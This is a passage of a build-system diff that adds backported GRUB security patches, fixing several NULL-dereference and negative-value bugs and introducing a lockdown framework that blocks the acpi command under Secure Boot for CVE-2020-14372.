+- infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+- else
+- infoplist = 0;
++ infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+ grub_errno = GRUB_ERR_NONE;
+ if (infoplist)
+ {
diff --git a/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
new file mode 100644
index 0000000000..ea563a41a0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
@@ -0,0 +1,41 @@
+From 5d2dd0052474a882a22e47cc8c3ed87a01819f6b Mon Sep 17 00:00:00 2001
+From: Daniel Kiper <daniel.kiper@oracle.com>
+Date: Thu, 25 Feb 2021 18:35:01 +0100
+Subject: [PATCH] util/grub-install: Fix NULL pointer dereferences
+
+Two grub_device_open() calls does not have associated NULL checks
+for returned values. Fix that and appease the Coverity.
+
+Fixes: CID 314583
+
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b3a95655b4391122e7b0315d8cc6f876caf8183]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-install.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/util/grub-install.c b/util/grub-install.c
+index a82725f..367350f 100644
+--- a/util/grub-install.c
++++ b/util/grub-install.c
+@@ -1775,6 +1775,8 @@ main (int argc, char *argv[])
+ fill_core_services (core_services);
+
+ ins_dev = grub_device_open (install_drive);
++ if (ins_dev == NULL)
++ grub_util_error ("%s", grub_errmsg);
+
+ bless (ins_dev, core_services, 0);
+
+@@ -1875,6 +1877,8 @@ main (int argc, char *argv[])
+ fill_core_services(core_services);
+
+ ins_dev = grub_device_open (install_drive);
++ if (ins_dev == NULL)
++ grub_util_error ("%s", grub_errmsg);
+
+ bless (ins_dev, boot_efi, 1);
+ if (!removable && update_nvram)
diff --git a/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
new file mode 100644
index 0000000000..0cd8ec3611
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
@@ -0,0 +1,46 @@
+From 3d68daf2567aace4b52bd238cfd4a8111af3bc04 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 14:33:50 +0000
+Subject: [PATCH] util/grub-editenv: Fix incorrect casting of a signed value
+
+The return value of ftell() may be negative (-1) on error. While it is
+probably unlikely to occur, we should not blindly cast to an unsigned
+value without first testing that it is not negative.
+
+Fixes: CID 73856
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5dc41edc4eba259c6043ae7698c245ec1baaacc6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-editenv.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-editenv.c b/util/grub-editenv.c
+index f3662c9..db6f187 100644
+--- a/util/grub-editenv.c
++++ b/util/grub-editenv.c
+@@ -125,6 +125,7 @@ open_envblk_file (const char *name)
+ {
+ FILE *fp;
+ char *buf;
++ long loc;
+ size_t size;
+ grub_envblk_t envblk;
+
+@@ -143,7 +144,12 @@ open_envblk_file (const char *name)
+ grub_util_error (_("cannot seek `%s': %s"), name,
+ strerror (errno));
+
+- size = (size_t) ftell (fp);
++ loc = ftell (fp);
++ if (loc < 0)
++ grub_util_error (_("cannot get file location `%s': %s"), name,
++ strerror (errno));
++
++ size = (size_t) loc;
+
+ if (fseek (fp, 0, SEEK_SET) < 0)
+ grub_util_error (_("cannot seek `%s': %s"), name,
diff --git a/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
new file mode 100644
index 0000000000..66d7c0aa42
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
@@ -0,0 +1,50 @@
+From e301a0f38a2130eb80f346c31e43bf5089af583c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:04:28 +0000
+Subject: [PATCH] util/glue-efi: Fix incorrect use of a possibly negative value
+
+It is possible for the ftell() function to return a negative value,
+although it is fairly unlikely here, we should be checking for
+a negative value before we assign it to an unsigned value.
+
+Fixes: CID 73744
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=1641d74e16f9d1ca35ba1a87ee4a0bf3afa48e72]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/glue-efi.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/util/glue-efi.c b/util/glue-efi.c
+index 68f5316..de0fa6d 100644
+--- a/util/glue-efi.c
++++ b/util/glue-efi.c
+@@ -39,13 +39,23 @@ write_fat (FILE *in32, FILE *in64, FILE *out, const char *out_filename,
+ struct grub_macho_fat_header head;
+ struct grub_macho_fat_arch arch32, arch64;
+ grub_uint32_t size32, size64;
++ long size;
+ char *buf;
+
+ fseek (in32, 0, SEEK_END);
+- size32 = ftell (in32);
++ size = ftell (in32);
++ if (size < 0)
++ grub_util_error ("cannot get end of input file '%s': %s",
++ name32, strerror (errno));
++ size32 = (grub_uint32_t) size;
+ fseek (in32, 0, SEEK_SET);
++
+ fseek (in64, 0, SEEK_END);
+- size64 = ftell (in64);
++ size = ftell (in64);
++ if (size < 0)
++ grub_util_error ("cannot get end of input file '%s': %s",
++ name64, strerror (errno));
++ size64 = (grub_uint64_t) size;
+ fseek (in64, 0, SEEK_SET);
+
+ head.magic = grub_cpu_to_le32_compile_time (GRUB_MACHO_FAT_EFI_MAGIC);
diff --git a/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
new file mode 100644
index 0000000000..b279222fff
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
@@ -0,0 +1,28 @@
+From f5fb56954e5926ced42a980c3e0842ffd5fea2aa Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 3 Apr 2020 23:05:13 +1100
+Subject: [PATCH] script/execute: Fix NULL dereference in
+ grub_script_execute_cmdline()
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=41ae93b2e6c75453514629bcfe684300e3aec0ce]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 7e028e1..5ea2aef 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -940,7 +940,7 @@ grub_script_execute_cmdline (struct grub_script_cmd *cmd)
+ struct grub_script_argv argv = { 0, 0, 0 };
+
+ /* Lookup the command. */
+- if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args[0])
++ if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args || ! argv.args[0])
+ return grub_errno;
+
+ for (i = 0; i < argv.argc; i++)
diff --git a/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
new file mode 100644
index 0000000000..5a327fe1d2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
@@ -0,0 +1,33 @@
+From dd82f98fa642907817f59aeaf3761b786898df85 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 16:57:37 +1100
+Subject: [PATCH] commands/ls: Require device_name is not NULL before printing
+
+This can be triggered with:
+ ls -l (0 0*)
+and causes a NULL deref in grub_normal_print_device_info().
+
+I'm not sure if there's any implication with the IEEE 1275 platform.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6afbe6063c95b827372f9ec310c9fc7461311eb1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/ls.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/ls.c b/grub-core/commands/ls.c
+index 5b7491a..326d2d6 100644
+--- a/grub-core/commands/ls.c
++++ b/grub-core/commands/ls.c
+@@ -196,7 +196,7 @@ grub_ls_list_files (char *dirname, int longlist, int all, int human)
+ goto fail;
+ }
+
+- if (! *path)
++ if (! *path && device_name)
+ {
+ if (grub_errno == GRUB_ERR_UNKNOWN_FS)
+ grub_errno = GRUB_ERR_NONE;
diff --git a/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
new file mode 100644
index 0000000000..84117a9073
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
@@ -0,0 +1,37 @@
+From df2505c4c3cf42b0c419c99a5f9e1ce63e5a5938 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 17:30:42 +1100
+Subject: [PATCH] script/execute: Avoid crash when using "$#" outside a
+ function scope
+
+"$#" represents the number of arguments to a function. It is only
+defined in a function scope, where "scope" is non-NULL. Currently,
+if we attempt to evaluate "$#" outside a function scope, "scope" will
+be NULL and we will crash with a NULL pointer dereference.
+
+Do not attempt to count arguments for "$#" if "scope" is NULL. This
+will result in "$#" being interpreted as an empty string if evaluated
+outside a function scope.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fe0586347ee46f927ae27bb9673532da9f5dead5]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 5ea2aef..23d34bd 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -485,7 +485,7 @@ gettext_putvar (const char *str, grub_size_t len,
+ return 0;
+
+ /* Enough for any number. */
+- if (len == 1 && str[0] == '#')
++ if (len == 1 && str[0] == '#' && scope != NULL)
+ {
+ grub_snprintf (*ptr, 30, "%u", scope->argv.argc);
+ *ptr += grub_strlen (*ptr);
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch b/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
index 896a2145d4..7214ead9a7 100644
--- a/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
@@ -30,7 +30,7 @@ Signed-off-by: Peter Jones <pjones@redhat.com>
Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
Upstream-Status: Backport
-CVE: CVE-2020-14309, CVE-2020-14310, CVE-2020-14311
+CVE: CVE-2020-14309 CVE-2020-14310 CVE-2020-14311
Reference to upstream patch:
https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3f05d693d1274965ffbe4ba99080dc2c570944c6
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
new file mode 100644
index 0000000000..08e7666cde
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
@@ -0,0 +1,76 @@
+From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:41 +0200
+Subject: [PATCH] acpi: Don't register the acpi command when locked down
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The command is not allowed when lockdown is enforced. Otherwise an
+attacker can instruct the GRUB to load an SSDT table to overwrite
+the kernel lockdown configuration and later load and execute
+unsigned code.
+
+Fixes: CVE-2020-14372
+
+Reported-by: Máté Kukri <km@mkukri.xyz>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 5 +++++
+ grub-core/commands/acpi.c | 15 ++++++++-------
+ 2 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 0786427..47ac7ff 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer
+ (RSDP) in the Extended BIOS Data Area to point to the new tables. If the
+ @option{--no-ebda} option is used, the new tables will be known only to
+ GRUB, but may be used by GRUB's EFI emulation.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ Otherwise an attacker can instruct the GRUB to load an SSDT table to
++ overwrite the kernel lockdown configuration and later load and execute
++ unsigned code.
+ @end deffn
+
+
+diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c
+index 5a1499a..1215f2a 100644
+--- a/grub-core/commands/acpi.c
++++ b/grub-core/commands/acpi.c
+@@ -27,6 +27,7 @@
+ #include <grub/mm.h>
+ #include <grub/memory.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ #ifdef GRUB_MACHINE_EFI
+ #include <grub/efi/efi.h>
+@@ -775,13 +776,13 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(acpi)
+ {
+- cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0,
+- N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
+- "--load-only=TABLE1,TABLE2] FILE1"
+- " [FILE2] [...]"),
+- N_("Load host ACPI tables and tables "
+- "specified by arguments."),
+- options);
++ cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0,
++ N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
++ "--load-only=TABLE1,TABLE2] FILE1"
++ " [FILE2] [...]"),
++ N_("Load host ACPI tables and tables "
++ "specified by arguments."),
++ options);
+ }
+
+ GRUB_MOD_FINI(acpi)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
new file mode 100644
index 0000000000..745f335501
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
@@ -0,0 +1,130 @@
+From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Wed, 23 Sep 2020 11:33:33 -0400
+Subject: [PATCH] verifiers: Move verifiers API to kernel image
+
+Move verifiers API from a module to the kernel image, so it can be
+used there as well. There are no functional changes in this patch.
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/Makefile.am | 1 +
+ grub-core/Makefile.core.def | 6 +-----
+ grub-core/kern/main.c | 4 ++++
+ grub-core/{commands => kern}/verifiers.c | 8 ++------
+ include/grub/verify.h | 9 ++++++---
+ 5 files changed, 14 insertions(+), 14 deletions(-)
+ rename grub-core/{commands => kern}/verifiers.c (97%)
+
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 3ea8e7f..375c30d 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/verify.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 474a63e..cff02f2 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -140,6 +140,7 @@ kernel = {
+ common = kern/rescue_parser.c;
+ common = kern/rescue_reader.c;
+ common = kern/term.c;
++ common = kern/verifiers.c;
+
+ noemu = kern/compiler-rt.c;
+ noemu = kern/mm.c;
+@@ -942,11 +943,6 @@ module = {
+ cppflags = '-I$(srcdir)/lib/posix_wrap';
+ };
+
+-module = {
+- name = verifiers;
+- common = commands/verifiers.c;
+-};
+-
+ module = {
+ name = shim_lock;
+ common = commands/efi/shim_lock.c;
+diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c
+index 9cad0c4..73967e2 100644
+--- a/grub-core/kern/main.c
++++ b/grub-core/kern/main.c
+@@ -29,6 +29,7 @@
+ #include <grub/command.h>
+ #include <grub/reader.h>
+ #include <grub/parser.h>
++#include <grub/verify.h>
+
+ #ifdef GRUB_MACHINE_PCBIOS
+ #include <grub/machine/memory.h>
+@@ -274,6 +275,9 @@ grub_main (void)
+ grub_printf ("Welcome to GRUB!\n\n");
+ grub_setcolorstate (GRUB_TERM_COLOR_STANDARD);
+
++ /* Init verifiers API. */
++ grub_verifiers_init ();
++
+ grub_load_config ();
+
+ grub_boot_time ("Before loading embedded modules.");
+diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c
+similarity index 97%
+rename from grub-core/commands/verifiers.c
+rename to grub-core/kern/verifiers.c
+index 0dde481..aa3dc7c 100644
+--- a/grub-core/commands/verifiers.c
++++ b/grub-core/kern/verifiers.c
+@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type)
+ return GRUB_ERR_NONE;
+ }
+
+-GRUB_MOD_INIT(verifiers)
++void
++grub_verifiers_init (void)
+ {
+ grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open);
+ }
+-
+-GRUB_MOD_FINI(verifiers)
+-{
+- grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY);
+-}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index ea04914..cd129c3 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -64,7 +64,10 @@ struct grub_file_verifier
+ grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type);
+ };
+
+-extern struct grub_file_verifier *grub_file_verifiers;
++extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers);
++
++extern void
++grub_verifiers_init (void);
+
+ static inline void
+ grub_verifier_register (struct grub_file_verifier *ver)
+@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver)
+ grub_list_remove (GRUB_AS_LIST (ver));
+ }
+
+-grub_err_t
+-grub_verify_string (char *str, enum grub_verify_string_type type);
++extern grub_err_t
++EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type);
+
+ #endif /* ! GRUB_VERIFY_HEADER */
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
new file mode 100644
index 0000000000..a98b5d0455
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
@@ -0,0 +1,431 @@
+From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:02 +0200
+Subject: [PATCH] kern: Add lockdown support
+
+When the GRUB starts on a secure boot platform, some commands can be
+used to subvert the protections provided by the verification mechanism and
+could lead to booting untrusted system.
+
+To prevent that situation, allow GRUB to be locked down. That way the code
+may check if GRUB has been locked down and further restrict the commands
+that are registered or what subset of their functionality could be used.
+
+The lockdown support adds the following components:
+
+* The grub_lockdown() function which can be used to lockdown GRUB if,
+ e.g., UEFI Secure Boot is enabled.
+
+* The grub_is_lockdown() function which can be used to check if the GRUB
+ was locked down.
+
+* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI
+ tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other
+ verifiers. These files are only successfully verified if another registered
+ verifier returns success. Otherwise, the whole verification process fails.
+
+ For example, PE/COFF binaries verification can be done by the shim_lock
+ verifier which validates the signatures using the shim_lock protocol.
+ However, the verification is not deferred directly to the shim_lock verifier.
+ The shim_lock verifier is hooked into the verification process instead.
+
+* A set of grub_{command,extcmd}_lockdown functions that can be used by
+ code registering command handlers, to only register unsafe commands if
+ the GRUB has not been locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.common | 2 +
+ docs/grub-dev.texi | 27 +++++++++++++
+ docs/grub.texi | 8 ++++
+ grub-core/Makefile.am | 5 ++-
+ grub-core/Makefile.core.def | 1 +
+ grub-core/commands/extcmd.c | 23 +++++++++++
+ grub-core/kern/command.c | 24 +++++++++++
+ grub-core/kern/lockdown.c | 80 +++++++++++++++++++++++++++++++++++++
+ include/grub/command.h | 5 +++
+ include/grub/extcmd.h | 7 ++++
+ include/grub/lockdown.h | 44 ++++++++++++++++++++
+ 11 files changed, 225 insertions(+), 1 deletion(-)
+ create mode 100644 grub-core/kern/lockdown.c
+ create mode 100644 include/grub/lockdown.h
+
+diff --git a/conf/Makefile.common b/conf/Makefile.common
+index 6cd71cb..2a1a886 100644
+--- a/conf/Makefile.common
++++ b/conf/Makefile.common
+@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER
+ CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)'
++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)'
++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) $(CPPFLAGS_VIDEO_LIST) \
+diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi
+index ee389fd..635ec72 100644
+--- a/docs/grub-dev.texi
++++ b/docs/grub-dev.texi
+@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}.
+ * PFF2 Font File Format::
+ * Graphical Menu Software Design::
+ * Verifiers framework::
++* Lockdown framework::
+ * Copying This Manual:: Copying This Manual
+ * Index::
+ @end menu
+@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just
+ the context. If you return no error during any of @samp{init}, @samp{write} and
+ @samp{fini} then the file is considered as having succeded verification.
+
++@node Lockdown framework
++@chapter Lockdown framework
++
++The GRUB can be locked down, which is a restricted mode where some operations
++are not allowed. For instance, some commands cannot be used when the GRUB is
++locked down.
++
++The function
++@code{grub_lockdown()} is used to lockdown GRUB and the function
++@code{grub_is_lockdown()} function can be used to check whether lockdown is
++enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED}
++and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled.
++
++The following functions can be used to register the commands that can only be
++used when lockdown is disabled:
++
++@itemize
++
++@item @code{grub_cmd_lockdown()} registers command which should not run when the
++GRUB is in lockdown mode.
++
++@item @code{grub_cmd_lockdown()} registers extended command which should not run
++when the GRUB is in lockdown mode.
++
++@end itemize
++
+ @node Copying This Manual
+ @appendix Copying This Manual
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 8779507..d778bfb 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order.
+ * Using digital signatures:: Booting digitally signed code
+ * UEFI secure boot and shim:: Booting digitally signed PE files
+ * Measured Boot:: Measuring boot components
++* Lockdown:: Lockdown when booting on a secure setup
+ @end menu
+
+ @node Authentication and authorisation
+@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between
+
+ Measured boot is currently only supported on EFI platforms.
+
++@node Lockdown
++@section Lockdown when booting on a secure setup
++
++The GRUB can be locked down when booted on a secure boot environment, for example
++if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
++be restricted and some operations/commands cannot be executed.
++
+ @node Platform limitations
+ @chapter Platform limitations
+
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 375c30d..3096241 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h
+ if COND_emu
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h
+@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES)
+ b=`basename $$pp .marker`; \
+ sed -n \
+ -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
++ -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
+ -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
+- -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
++ -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \
++ -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
+ done) | sort -u > $@
+ platform_DATA += command.lst
+ CLEANFILES += command.lst
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index cff02f2..651ea2a 100644
+--- a/grub-core/Makefile.core.def
